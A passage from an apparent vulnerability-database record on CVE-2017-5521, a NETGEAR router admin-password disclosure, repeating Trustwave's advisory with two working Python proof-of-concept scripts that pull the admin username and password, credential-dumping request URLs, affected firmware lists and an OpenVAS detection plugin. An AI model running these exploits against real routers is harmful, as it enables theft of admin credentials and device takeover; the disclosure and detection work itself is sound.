latest and is patched)\r\n# R8300 V1.0.2.48_1.0.52\r\n# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)\r\n# R8500 V1.0.2.26_1.0.41\r\n# R8500 V1.0.0.56_1.0.28\r\n# R8500 V1.0.0.20_1.0.11\r\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\r\n# VEGN2610 V1.0.0.29_1.0.29\r\n# VEGN2610 V1.0.0.27_1.0.27\r\n# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)\r\n# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)\r\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\r\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\r\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\r\n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\r\n# WNDR4500v2 V1.0.0.42_1.0.25\r\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\r\n# WGR614v10 V1.0.2.58_60.0.84NA\r\n# WGR614v10 V1.0.2.54_60.0.82NA\r\n# WN3100RP V1.0.0.14_1.0.19 (Latest)\r\n# WN3100RP V1.0.0.6_1.0.12\r\n \r\n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\r\n# Lenovo R3220 V1.0.0.13_1.0.13\r\n \r\n \r\nProduct description:\r\nMultiple Netgear Routers\r\n \r\nMany Netgear routers are prone to password disclosure via simple crafted \r\nrequests to the web management server. The bug is exploitable remotely if the \r\nremote management option is set and can also be exploited given access to the \r\nrouter over LAN or WLAN.\r\n \r\nWhen trying to access the web panel a user is asked to authenticate, if the \r\nauthentication is cancelled and password recovery is not enabled, the user is\r\nredirected to a page which exposes a password recovery token. If a user \r\nsupplies the correct token to the page \r\nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not\r\nenabled), they will receive the admin password for the router. 
\r\n \r\nIf password recovery is set the exploit will fail, as it will ask the user for the recovery \r\nquestions which were previously set when enabling the feature, this is\r\npersistent, even after disabling the recovery option the exploit will fail, \r\nbecause the router will ask for the security questions.\r\nThis can easily be reproduced using the attached poc, or by sending these two \r\nsimple requests via the browser:\r\n1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token\r\n2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)\r\n \r\n## netgore.py\r\nimport sys\r\nimport requests\r\n \r\n \r\ndef scrape(text, start_trig, end_trig):\r\n if text.find(start_trig) != -1:\r\n return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\r\n else:\r\n return \"i_dont_speak_english\"\r\n#disable nasty insecure ssl warning\r\nrequests.packages.urllib3.disable_warnings()\r\n#1st stage - get token\r\nip = sys.argv[1]\r\nport = sys.argv[2]\r\nurl = 'http://' + ip + ':' + port + '/'\r\ntry:\r\n r = requests.get(url)\r\nexcept:\r\n url = 'https://' + ip + ':' + port + '/'\r\n r = requests.get(url, verify=False)\r\nmodel = r.headers.get('WWW-Authenticate')\r\nif model is not None:\r\n print \"Attcking: \" + model[13:-1]\r\nelse:\r\n print \"not a netgear router\"\r\n sys.exit(0)\r\ntoken = scrape(r.text, 'unauth.cgi?id=', '\\\"')\r\nif token == 'i_dont_speak_english':\r\n print \"not vulnerable\"\r\n sys.exit(0)\r\nprint \"token found: \" + token\r\n#2nd stage - pass the token - get the password\r\nurl = url + 'passwordrecovered.cgi?id=' + token\r\nr = requests.post(url, verify=False)\r\n#profit\r\nif r.text.find('left\\\">') != -1:\r\n username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))\r\n username = scrape(username, '>', '\\'')\r\n password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))\r\n 
password = scrape(password, '>', '\\'')\r\n if username == \"i_dont_speak_english\":\r\n username = (scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>'))\r\n password = (scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>'))\r\nelse:\r\n print \"not vulnerable becuse password recovery IS set\"\r\n sys.exit(0)\r\n#html encoding pops out of nowhere, lets replace that\r\npassword = password.replace(\"#\",\"#\")\r\npassword = password.replace(\"&\",\"&\")\r\nprint \"user: \" + username\r\nprint \"pass: \" + password\r\n \r\n================================\r\nJust run the PoC against a router to get the credentials if it is vulnerable.\r\n \r\n \r\n \r\nFinding 2: Remote and Local Password Disclosure\r\nCredit: Simon Kenin of Trustwave SpiderLabs\r\nCVE: CVE-2017-5521\r\n \r\nVersion affected: \r\n \r\n# AC1450 V1.0.0.34_10.0.16 (Latest)\r\n# AC1450 V1.0.0.22_1.0.10\r\n# AC1450 V1.0.0.14_1.0.6\r\n# D6300 V1.0.0.96_1.1.96 (Latest)\r\n# D6300B V1.0.0.36_1.0.36\r\n# D6300B V1.0.0.32_1.0.32\r\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)\r\n# D6400 V1.0.0.22_1.0.22\r\n# DC112A V1.0.0.30_1.0.60 (Latest)\r\n# DGN2200v4 V1.0.0.76_1.0.76 (Latest)\r\n# DGN2200v4 V1.0.0.66_1.0.66\r\n# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)\r\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\r\n# R6200 V1.0.1.56_1.0.43 (Latest)\r\n# R6200 V1.0.1.52_1.0.41\r\n# R6200 V1.0.1.48_1.0.37\r\n# R6200v2 V1.0.3.10_10.1.10 (Latest)\r\n# R6200v2 V1.0.1.20_1.0.18\r\n# R6250 V1.0.4.6_10.1.12 (Latest beta)\r\n# R6250 V1.0.4.2_10.1.10 (Latest stable)\r\n# R6250 V1.0.1.84_1.0.78 \r\n# R6300 V1.0.2.78_1.0.58 (Latest)\r\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\r\n# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)\r\n# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)\r\n# R6700 V1.0.0.26_10.0.26 (Latest)\r\n# R6700 V1.0.0.24_10.0.18\r\n# R6900 V1.0.0.4_1.0.10 (Latest)\r\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is 
patched)\r\n# R7000 V1.0.4.30_1.1.67\r\n# R7900 V1.0.1.8_10.0.14 (Latest beta)\r\n# R7900 V1.0.1.4_10.0.12 (Latest stable)\r\n# R7900 V1.0.0.10_10.0.7\r\n# R7900 V1.0.0.8_10.0.5\r\n# R7900 V1.0.0.6_10.0.4\r\n# R8000 V1.0.3.26_1.1.18 (Latest beta)\r\n# R8000 V1.0.3.4_1.1.2 (Latest stable)\r\n# R8300 V1.0.2.48_1.0.52\r\n# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)\r\n# R8500 V1.0.2.30_1.0.43\r\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\r\n# VEGN2610 V1.0.0.27_1.0.27\r\n# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)\r\n# VEVG2660 V1.0.0.23_1.0.23\r\n# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)\r\n# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)\r\n# WNDR3400v3 V1.0.1.2_1.0.51\r\n# WNDR3400v3 V1.0.0.22_1.0.29\r\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\r\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\r\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\r\n# WNDR4500 V1.0.1.6_1.0.24 \r\n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\r\n# WNDR4500v2 V1.0.0.50_1.0.30\r\n# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)\r\n# WNR1000v3 V1.0.2.62_60.0.87 (Latest)\r\n# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)\r\n# WNR3500Lv2 V1.2.0.32_40.0.74\r\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\r\n# WGR614v10 V1.0.2.58_60.0.84NA\r\n# WGR614v10 V1.0.2.54_60.0.82NA\r\n \r\n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\r\n# Lenovo R3220 V1.0.0.13_1.0.13\r\n \r\n \r\nMany Netgear routers are prone to password disclosure via simple crafted \r\nrequest to the web management server. The bug is exploitable remotely if the \r\nremote management option is set and can also be exploited given access to the \r\nrouter over LAN or WLAN.\r\n \r\nNetgear routers have an option to restore forgotten password via 2 security \r\nquestions. If the recovery option is disabled (which is the default), it is\r\nstill possible to recover the password by sending a correct token to the \r\nrecovery page. 
\r\n \r\nIf a user supplies the correct token to the page \r\nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not\r\nenabled), they will receive the admin password for the router. If password \r\nrecovery is set the exploit will fail, as it will ask the user for the recovery \r\nquestions which were previously set when enabling the feature, this is\r\npersistent, even after disabling the recovery option, the exploit will fail, \r\nbecause the router will ask for the security questions.\r\n \r\nThis mechanism does not work correctly on the very first request to \r\n\"passwordrecovered.cgi\" and the token is not properly checked, this means that \r\nany TOKEN value will result in disclosure of the password.\r\nThe issue occurs after every reboot of the router.\r\n \r\nThis can easily be reproduced using the attached poc, or by sending a simple \r\nrequest via the browser:\r\n1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)\r\n \r\n## netgore2.py\r\nimport sys\r\nimport requests\r\n \r\ndef scrape(text, start_trig, end_trig):\r\n if text.find(start_trig) != -1:\r\n return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\r\n else:\r\n return \"i_dont_speak_english\"\r\n#disable nasty insecure ssl warning\r\nrequests.packages.urllib3.disable_warnings()\r\n#1st stage\r\nip = sys.argv[1]\r\nport = sys.argv[2]\r\nurl = 'http://' + ip + ':' + port + '/'\r\ntry:\r\n r = requests.get(url)\r\nexcept:\r\n url = 'https://' + ip + ':' + port + '/'\r\n r = requests.get(url, verify=False)\r\nmodel = r.headers.get('WWW-Authenticate')\r\nif model is not None:\r\n print \"Attcking: \" + model[13:-1]\r\nelse:\r\n print \"not a netgear router\"\r\n sys.exit(0)\r\n#2nd stage\r\nurl = url + 'passwordrecovered.cgi?id=get_rekt'\r\ntry:\r\n r = requests.post(url, verify=False)\r\nexcept:\r\n print \"not vulnerable router\"\r\n sys.exit(0)\r\n#profit\r\nif 
r.text.find('left\\\">') != -1:\r\n username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))\r\n username = scrape(username, '>', '\\'')\r\n password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))\r\n password = scrape(password, '>', '\\'')\r\n if username == \"i_dont_speak_english\":\r\n username = (scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>'))\r\n password = (scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>'))\r\nelse:\r\n print \"not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again\"\r\n sys.exit(0)\r\n#html encoding pops out of nowhere, lets replace that\r\npassword = password.replace(\"#\",\"#\")\r\npassword = password.replace(\"&\",\"&\")\r\nprint \"user: \" + username\r\nprint \"pass: \" + password\r\n \r\n================================\r\nJust run the PoC against a router to get the credentials if it is vulnerable.\r\n \r\n \r\n \r\n \r\nRemediation Steps:\r\nPlease see NETGEAR's KBA for list of firmware patches for various models. As a \r\nworkaround, the bug only works when password recovery is NOT set. If you do set\r\npassword recovery this is not exploitable.\r\n \r\nRevision History:\r\n04/06/2016 - Vulnerability disclosed to vendor\r\n04/19/2016 - Request for update and received confirmation of receipt of the advisories\r\n05/18/2016 - Request for update; no response\r\n07/14/2016 - Request for update\r\n07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage\r\n10/17/2016 - Request for update\r\n12/15/2016 - Notice of intent to publish advisories\r\n01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd\r\n01/30/2017 - Advisory published\r\n \r\n \r\nReferences\r\n1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html\r\n2. https://www.exploit-db.com/exploits/32883/\r\n3. 
http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability\r\n \r\n \r\nAbout Trustwave:\r\nTrustwave is the leading provider of on-demand and subscription-based\r\ninformation security and payment card industry compliance management\r\nsolutions to businesses and government entities throughout the world. For\r\norganizations faced with today's challenging data security and compliance\r\nenvironment, Trustwave provides a unique approach with comprehensive\r\nsolutions that include its flagship TrustKeeper compliance management\r\nsoftware and other proprietary security solutions. Trustwave has helped\r\nthousands of organizations--ranging from Fortune 500 businesses and large\r\nfinancial institutions to small and medium-sized retailers--manage\r\ncompliance and secure their network infrastructure, data communications and\r\ncritical information assets. Trustwave is headquartered in Chicago with\r\noffices throughout North America, South America, Europe, Africa, China and\r\nAustralia. For more information, visit https://www.trustwave.com\r\n \r\nAbout Trustwave SpiderLabs:\r\nSpiderLabs(R) is the advanced security team at Trustwave focused on\r\napplication security, incident response, penetration testing, physical\r\nsecurity and security research. The team has performed over a thousand\r\nincident investigations, thousands of penetration tests and hundreds of\r\napplication security tests globally. In addition, the SpiderLabs Research\r\nteam provides intelligence through bleeding-edge research and proof of\r\nconcept tool development to enhance Trustwave's products and services.\r\nhttps://www.trustwave.com/spiderlabs\r\n \r\nDisclaimer:\r\nThe information provided in this advisory is provided \"as is\" without\r\nwarranty of any kind. Trustwave disclaims all warranties, either express or\r\nimplied, including the warranties of merchantability and fitness for a\r\nparticular purpose. 
In no event shall Trustwave or its suppliers be liable\r\nfor any damages whatsoever including direct, indirect, incidental,\r\nconsequential, loss of business profits or special damages, even if\r\nTrustwave or its suppliers have been advised of the possibility of such\r\ndamages. Some states do not allow the exclusion or limitation of liability\r\nfor consequential or incidental damages so the foregoing limitation may not\r\napply.\n\n# 0day.today [2018-04-13] #", "sourceHref": "https://0day.today/exploit/26837", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2020-05-11T21:01:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5521"], "description": "Multiple NETGEAR devices are prone to a admin password disclosure\n vulnerability", "modified": "2020-05-07T00:00:00", "published": "2017-01-23T00:00:00", "id": "OPENVAS:1361412562310106536", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106536", "type": "openvas", "title": "NETGEAR Devices Password Disclosure Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# NETGEAR Devices Password Disclosure Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106536\");\n script_version(\"2020-05-07T07:15:05+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-07 07:15:05 +0000 (Thu, 07 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-01-23 12:10:26 +0700 (Mon, 23 Jan 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_cve_id(\"CVE-2017-5521\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_name(\"NETGEAR Devices Password Disclosure Vulnerability\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 8443);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"summary\", value:\"Multiple NETGEAR devices are prone to a admin password disclosure\n vulnerability\");\n\n script_tag(name:\"vuldetect\", value:\"Tries to recover the admin password.\");\n\n script_tag(name:\"insight\", value:\"An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300,\n R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password\n disclosure via simple crafted requests to the web management server. 
The bug is exploitable remotely if the\n remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When\n trying to access the web panel, a user is asked to authenticate. If the authentication is canceled and password\n recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user\n supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled),\n they will receive the admin password for the router.\n\n If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were\n previously set when enabling that feature. This is persistent (even after disabling the recovery option, the\n exploit will fail) because the router will ask for the security questions.\");\n\n script_tag(name:\"affected\", value:\"NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3,\n WNR3500Lv2, R6250, R6700, R6900 and R8000 devices\");\n\n script_tag(name:\"solution\", value:\"As a mitigation manually enable the password recovery feature on your\n device and ensure that remote management is disabled.\");\n\n script_xref(name:\"URL\", value:\"http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port(default: 8443);\n\nres = http_get_cache(port: port, item: \"/\");\n\nif ('Basic realm=\"NETGEAR' >!< res)\n exit(0);\n\ntoken = eregmatch(pattern: \"unauth.cgi\\?id=([0-9]+)\", string: res);\nif (isnull(token[1]))\n exit(0);\n\ntoken = token[1];\n\nif (http_vuln_check(port: port, url: \"/passwordrecovered.cgi?id=\" + token,\n pattern: \"You can now log into the router using username .* and this recovered password\",\n extra_check: \"Router Admin Password\")) {\n report = http_report_vuln_url(port: port, url: \"/passwordrecovered.cgi?id=\" + token);\n 
security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:36", "description": "\nNETGEAR Routers - Password Disclosure", "edition": 1, "published": "2017-01-30T00:00:00", "title": "NETGEAR Routers - Password Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5521"], "modified": "2017-01-30T00:00:00", "id": "EXPLOITPACK:640BC8CE4CE32D930C91A9B475F51D37", "href": "", "sourceData": "Trustwave SpiderLabs Security Advisory TWSL2017-003:\nMultiple Vulnerabilities in NETGEAR Routers\n\nPublished: 01/30/2017 \nVersion: 1.0\n\nVendor: NETGEAR (http://www.netgear.com/)\nProduct: Multiple products\n\nFinding 1: Remote and Local Password Disclosure\nCredit: Simon Kenin of Trustwave SpiderLabs\nCVE: CVE-2017-5521\n\nVersion affected: \n \n# AC1450 V1.0.0.34_10.0.16 (Latest)\n# AC1450 V1.0.0.22_1.0.10\n# AC1450 V1.0.0.14_1.0.6\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)\n# D6400 V1.0.0.34_1.3.34\n# D6400 V1.0.0.38_1.1.38\n# D6400 V1.0.0.22_1.0.22\n# DC112A V1.0.0.30_1.0.60 (Latest)\n# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\n# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)\n# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)\n# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)\n# R6300\tV1.0.2.78_1.0.58 (Latest)\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\n# R6300v2 V1.0.3.30_10.0.73\n# R6700 V1.0.1.14_10.0.29 (Latest beta)\n# R6700 V1.0.0.26_10.0.26 (Latest stable)\n# R6700 V1.0.0.24_10.0.18\n# R6900 V1.0.0.4_1.0.10 (Latest)\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\n# R8300 V1.0.2.48_1.0.52\n# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)\n# R8500 V1.0.2.26_1.0.41\n# R8500 
V1.0.0.56_1.0.28\n# R8500 V1.0.0.20_1.0.11\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\n# VEGN2610 V1.0.0.29_1.0.29\n# VEGN2610 V1.0.0.27_1.0.27\n# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)\n# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\n# WNDR4000 V1.0.2.4_9.1.86 (Latest)\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\n# WNDR4500v2 V1.0.0.42_1.0.25\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\n# WGR614v10 V1.0.2.58_60.0.84NA\n# WGR614v10 V1.0.2.54_60.0.82NA\n# WN3100RP V1.0.0.14_1.0.19 (Latest)\n# WN3100RP V1.0.0.6_1.0.12\n\n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\n# Lenovo R3220 V1.0.0.13_1.0.13\n\n\nProduct description:\nMultiple Netgear Routers\n\nMany Netgear routers are prone to password disclosure via simple crafted \nrequests to the web management server. The bug is exploitable remotely if the \nremote management option is set and can also be exploited given access to the \nrouter over LAN or WLAN.\n\nWhen trying to access the web panel a user is asked to authenticate, if the \nauthentication is cancelled and password recovery is not enabled, the user is \nredirected to a page which exposes a password recovery token. If a user \nsupplies the correct token to the page \nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not \nenabled), they will receive the admin password for the router. \n\nIf password recovery is set the exploit will fail, as it will ask the user for the recovery \nquestions which were previously set when enabling the feature, this is \npersistent, even after disabling the recovery option the exploit will fail, \nbecause the router will ask for the security questions.\nThis can easily be reproduced using the attached poc, or by sending these two \nsimple requests via the browser:\n1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token\n2. 
http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)\n\n## netgore.py\nimport sys\nimport requests\n\n\ndef scrape(text, start_trig, end_trig):\n if text.find(start_trig) != -1:\n\treturn text.split(start_trig, 1)[-1].split(end_trig, 1)[0]\n else:\n return \"i_dont_speak_english\"\n#disable nasty insecure ssl warning\nrequests.packages.urllib3.disable_warnings()\n#1st stage - get token\nip = sys.argv[1]\nport = sys.argv[2]\nurl = 'http://' + ip + ':' + port + '/'\ntry:\n\tr = requests.get(url)\nexcept:\n\turl = 'https://' + ip + ':' + port + '/'\n\tr = requests.get(url, verify=False)\nmodel = r.headers.get('WWW-Authenticate')\nif model is not None:\n\tprint \"Attcking: \" + model[13:-1]\nelse:\n\tprint \"not a netgear router\"\n\tsys.exit(0)\ntoken = scrape(r.text, 'unauth.cgi?id=', '\\\"')\nif token == 'i_dont_speak_english':\n\tprint \"not vulnerable\"\n\tsys.exit(0)\nprint \"token found: \" + token\n#2nd stage - pass the token - get the password\nurl = url + 'passwordrecovered.cgi?id=' + token\nr = requests.post(url, verify=False)\n#profit\nif r.text.find('left\\\">') != -1:\n\tusername = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))\n\tusername = scrape(username, '>', '\\'')\n\tpassword = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))\n\tpassword = scrape(password, '>', '\\'')\n\tif username == \"i_dont_speak_english\":\n\t\tusername = (scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>'))\n\t\tpassword = (scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>'))\nelse:\n\tprint \"not vulnerable becuse password recovery IS set\"\n\tsys.exit(0)\n#html encoding pops out of nowhere, lets replace that\npassword = password.replace(\"#\",\"#\")\npassword = password.replace(\"&\",\"&\")\nprint \"user: \" + username\nprint \"pass: \" + password\n\n================================\nJust run the PoC against a router to get the 
credentials if it is vulnerable.\n\n\n\nFinding 2: Remote and Local Password Disclosure\nCredit: Simon Kenin of Trustwave SpiderLabs\nCVE: CVE-2017-5521\n\nVersion affected: \n\n# AC1450 V1.0.0.34_10.0.16 (Latest)\n# AC1450 V1.0.0.22_1.0.10\n# AC1450 V1.0.0.14_1.0.6\n# D6300 V1.0.0.96_1.1.96 (Latest)\n# D6300B V1.0.0.36_1.0.36\n# D6300B V1.0.0.32_1.0.32\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)\n# D6400 V1.0.0.22_1.0.22\n# DC112A V1.0.0.30_1.0.60 (Latest)\n# DGN2200v4 V1.0.0.76_1.0.76 (Latest)\n# DGN2200v4 V1.0.0.66_1.0.66\n# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\n# R6200 V1.0.1.56_1.0.43 (Latest)\n# R6200 V1.0.1.52_1.0.41\n# R6200 V1.0.1.48_1.0.37\n# R6200v2 V1.0.3.10_10.1.10 (Latest)\n# R6200v2 V1.0.1.20_1.0.18\n# R6250 V1.0.4.6_10.1.12 (Latest beta)\n# R6250 V1.0.4.2_10.1.10 (Latest stable)\n# R6250 V1.0.1.84_1.0.78 \n# R6300\tV1.0.2.78_1.0.58 (Latest)\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\n# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)\n# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)\n# R6700 V1.0.0.26_10.0.26 (Latest)\n# R6700 V1.0.0.24_10.0.18\n# R6900 V1.0.0.4_1.0.10 (Latest)\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)\n# R7000 V1.0.4.30_1.1.67\n# R7900 V1.0.1.8_10.0.14 (Latest beta)\n# R7900 V1.0.1.4_10.0.12 (Latest stable)\n# R7900 V1.0.0.10_10.0.7\n# R7900 V1.0.0.8_10.0.5\n# R7900 V1.0.0.6_10.0.4\n# R8000 V1.0.3.26_1.1.18 (Latest beta)\n# R8000 V1.0.3.4_1.1.2 (Latest stable)\n# R8300 V1.0.2.48_1.0.52\n# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)\n# R8500 V1.0.2.30_1.0.43\n# VEGN2610 V1.0.0.35_1.0.35 (Latest)\n# VEGN2610 V1.0.0.27_1.0.27\n# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)\n# VEVG2660 V1.0.0.23_1.0.23\n# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)\n# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)\n# WNDR3400v3 V1.0.1.2_1.0.51\n# WNDR3400v3 V1.0.0.22_1.0.29\n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)\n# 
WNDR4000 V1.0.2.4_9.1.86 (Latest)\n# WNDR4500 V1.0.1.40_1.0.68 (Latest)\n# WNDR4500 V1.0.1.6_1.0.24 \n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)\n# WNDR4500v2 V1.0.0.50_1.0.30\n# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)\n# WNR1000v3 V1.0.2.62_60.0.87 (Latest)\n# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)\n# WNR3500Lv2 V1.2.0.32_40.0.74\n# WGR614v10 V1.0.2.60_60.0.85NA (Latest)\n# WGR614v10 V1.0.2.58_60.0.84NA\n# WGR614v10 V1.0.2.54_60.0.82NA\n\n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)\n# Lenovo R3220 V1.0.0.13_1.0.13\n\n\nMany Netgear routers are prone to password disclosure via simple crafted \nrequest to the web management server. The bug is exploitable remotely if the \nremote management option is set and can also be exploited given access to the \nrouter over LAN or WLAN.\n\nNetgear routers have an option to restore forgotten password via 2 security \nquestions. If the recovery option is disabled (which is the default), it is \nstill possible to recover the password by sending a correct token to the \nrecovery page. \n\nIf a user supplies the correct token to the page \nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not \nenabled), they will receive the admin password for the router. If password \nrecovery is set the exploit will fail, as it will ask the user for the recovery \nquestions which were previously set when enabling the feature, this is \npersistent, even after disabling the recovery option, the exploit will fail, \nbecause the router will ask for the security questions.\n\nThis mechanism does not work correctly on the very first request to \n\"passwordrecovered.cgi\" and the token is not properly checked, this means that \nany TOKEN value will result in disclosure of the password.\nThe issue occurs after every reboot of the router.\n\nThis can easily be reproduced using the attached poc, or by sending a simple \nrequest via the browser:\n1. 
